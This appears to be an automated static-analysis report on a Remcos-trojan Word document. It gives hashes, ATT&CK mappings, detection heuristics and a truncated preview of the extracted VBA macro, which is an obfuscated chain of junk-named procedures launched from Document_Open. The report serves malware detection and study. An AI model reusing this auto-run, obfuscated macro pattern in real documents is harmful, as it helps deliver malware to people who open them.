Win.Trojan.Remcos-6656024-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 4e0bcef2b9251e2a…

MALICIOUS

Office (OLE)

Size: 914.0 KB
Created: 2017-07-18 19:46:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: 81e516b87acc0a3d13846be50d9fe467
SHA-1: 33db9cb899c5b8ca451b0a89822d55d7b14f48ca
SHA-256: 4e0bcef2b9251e2aaecbf6501c8df706bf449b0e12434873833c6091deb94f0e
Risk Score: 190

Malware Insights

Win.Trojan.Remcos-6656024-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro triggered by the Document_Open event (declared in the extracted source with mixed case as dOcUmeNT_OpEN; VBA resolves procedure names case-insensitively, so detection logic should match the event name case-insensitively as well). The macro uses the Shell() function, indicating an attempt to execute an external command. The ClamAV detection name 'Win.Trojan.Remcos-6656024-0' strongly suggests the malware family and its malicious intent. The macro likely downloads and executes a second-stage payload, consistent with common trojan behavior.

Heuristics (6)

  • ClamAV: Win.Trojan.Remcos-6656024-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Trojan.Remcos-6656024-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Environ() call (env variable access)
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 348786 bytes
SHA-256: ae1bb7c384256023986b425f20493b5ae97471899ca00eb00a55083e14947642
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.file2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub dOcUmeNT_OpEN(): Call ltknbhsbibalnxj: End Sub
Sub ltknbhsbibalnxj()
Call dahgvoekhyeivmg
End Sub
Private Sub dahgvoekhyeivmg()
Call alchoseygumndob
End Sub
Private Function alchoseygumndob() As Currency
Call kutyxiljlqxybys
End Function
Static Function kutyxiljlqxybys() As String
Call rwdopbuhaojodlc
End Function
Function rwdopbuhaojodlc() As Currency
Call sgodnawukkbmrpn
End Function
Sub sgodnawukkbmrpn()
Call qjtrucauehuqixs
End Sub
Private Function qjtrucauehuqixs() As Single
Call ivyehkxjtdsbmwx
End Function
Private Function ivyehkxjtdsbmwx() As Integer
Call xzwqdvvmsasstzw
End Function
Function xzwqdvvmsasstzw() As Object
Call zbrsqtclxyvpqkq
End Function
Function zbrsqtclxyvpqkq() As Single
Call fhkcbnvqbubtnhj
End Function
Private Sub fhkcbnvqbubtnhj()
Call fvdkrmikaqnewvc
End Sub
Static Function fvdkrmikaqnewvc() As Variant
Call dcqrrpxrknbvjnp
End Function
Sub dcqrrpxrknbvjnp()
Call nhyphetvzkrtmnx
End Sub
Function nhyphetvzkrtmnx() As Single
Call cpfuwqdeoglxpze
End Function
Static Sub cpfuwqdeoglxpze()
Call xsponusfqqaergo
End Sub
Static Sub xsponusfqqaergo()
Call uzcwnxhmannvexb
End Sub
Static Function uzcwnxhmannvexb() As Date
Call fekuendqpkesgxj
End Function
Sub fekuendqpkesgxj()
Call tmrzsynaehyxjkq
End Sub
Private Sub tmrzsynaehyxjkq()
Call vtuuyxegydvhbet
End Sub
Private Sub vtuuyxegydvhbet()
Call usqpmyxzdbuxxdp
End Sub
Static Sub usqpmyxzdbuxxdp()
Call mznigfjhcyyvfsm
End Sub
Function mznigfjhcyyvfsm() As String
Call jkijzjjwbufaoth
End Function
Private Function jkijzjjwbufaoth() As Byte
Call ttzaizqggqqkldy
End Function
Static Function ttzaizqggqqkldy() As Byte
Call avjraszevocbnri
End Function
Static Sub avjraszevocbnri()
Call bfugyrbrekuzbvt
End Sub
Sub bfugyrbrekuzbvt()
Call yizuftfrzhndsdy
End Sub
Private Function yizuftfrzhndsdy() As Variant
Call rtegsbchndlowcd
End Function
Static Function rtegsbchndlowcd() As Double
Call gxcsomajnalfdeb
End Function
Static Function gxcsomajnalfdeb()
Call iaxubkhiryocapw
End Function
Private Function iaxubkhiryocapw() As Variant
Call ofqemeanwvvgxmp
End Function
Static Sub ofqemeanwvvgxmp()
Call oujmcdnivqhrgai
End Sub
Private Sub oujmcdnivqhrgai()
Call mawucgcpfnuitsv
End Sub
Sub mawucgcpfnuitsv()
Call wfertvytukkgwsd
End Sub
Private Function wfertvytukkgwsd() As Variant
Call kolxhhicjgfkzek
End Function
Private Sub kolxhhicjgfkzek()
Call muosnfziddcurzn
End Sub
Private Sub muosnfziddcurzn()
Call eigfmogisdyjqpf
End Sub
Static Sub eigfmogisdyjqpf()
Call xqdygvsrszchyec
End Sub
Function xqdygvsrszchyec() As Object
Call tbyzzzsfrvkmhfx
End Function
Function tbyzzzsfrvkmhfx() As Long
Call dkoqipzqvsvwfpo
End Function
Private Sub dkoqipzqvsvwfpo()
Call klzgaiiolphngdy
End Sub
Static Sub klzgaiiolphngdy()
Call lvkvyhkbulyluhj
End Sub
Static Sub lvkvyhkbulyluhj()
Call jyojfjobojrplpo
End Sub
Static Sub jyojfjobojrplpo()
Call bktwsrlqdfqapot
End Sub
Sub bktwsrlqdfqapot()
Call qosiocktdcqqwqr
End Sub
Static Function qosiocktdcqqwqr() As Date
Call srnkbaqshzsotbm
End Function
Static Function srnkbaqshzsotbm() As Boolean
Call ywfumukxmwzsqyf
End Function
Sub ywfumukxmwzsqyf()
Call zkycctxrlsldzmy
End Sub
Private Sub zkycctxrlsldzmy()
Call wrljcwlyvoyunek
End Sub
Private Function wrljcwlyvoyunek() As Variant
Call gwuhslicklprpet
End Function
Static Sub gwuhslicklprpet()
Call vebmhxrmzijwsqa
End Sub
Sub vebmhxrmzijwsqa()
Call wldimvistfggkld
End Sub
Sub wldimvistfggkld()
Call vkadbxblydfwgjz
End Sub
Private Sub vkadbxblydfwgjz()
Call orxwventxzjuoyw
End Sub
Static Function orxwventxzjuoyw() As Byte
Call kcsxoinhwvrzxar
End Function
Function kcsxoinhwvrzxar()
Call naegifizltziybd
End Function
Sub naegifizltziybd()

... (truncated)